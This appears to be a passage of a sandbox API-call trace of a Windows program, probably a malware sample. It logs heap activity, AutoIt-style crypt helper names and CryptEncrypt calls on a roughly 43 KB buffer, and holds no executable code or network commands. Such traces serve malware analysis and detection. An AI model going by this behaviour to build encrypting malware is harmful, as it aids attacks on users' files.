RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0035.321] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0035.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0035.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0035.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0035.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0035.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0035.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0035.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0035.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0035.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.322] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0035.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0035.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0035.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0035.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0035.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0035.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0035.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0035.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0035.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0035.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0035.323] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0035.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0035.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0035.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0035.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0035.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.323] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0035.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0035.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0035.323] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0035.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0035.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0035.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0035.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0035.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0035.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0035.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0035.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0035.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0035.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0035.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0035.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0035.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0035.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0035.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0035.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0035.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0035.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0035.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0035.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0035.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0035.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0035.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0035.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0035.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0035.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0035.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0035.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0035.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0035.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0035.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0035.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0035.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0035.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0035.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0035.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0035.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0035.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0035.327] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0035.327] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da208, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da208*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0035.327] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.327] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.327] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.327] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.327] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.327] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.327] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.327] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.327] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0035.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.327] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.327] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0035.328] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.328] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.328] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.328] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.328] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.328] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0035.328] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0035.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.328] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0035.328] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.329] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.329] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xaafb, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xab00) returned 1 [0035.329] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.329] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0035.329] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.329] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.329] CharLowerBuffW (in: lpsz="byte[43777]", cchLength=0xb | out: lpsz="byte[43777]") returned 0xb [0035.329] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.330] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.330] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.330] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.330] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.330] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x975130*, pdwDataLen=0x6ae220*=0xaafb, dwBufLen=0xab00 | out: pbData=0x975130*, pdwDataLen=0x6ae220*=0xab00) returned 1 [0035.330] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 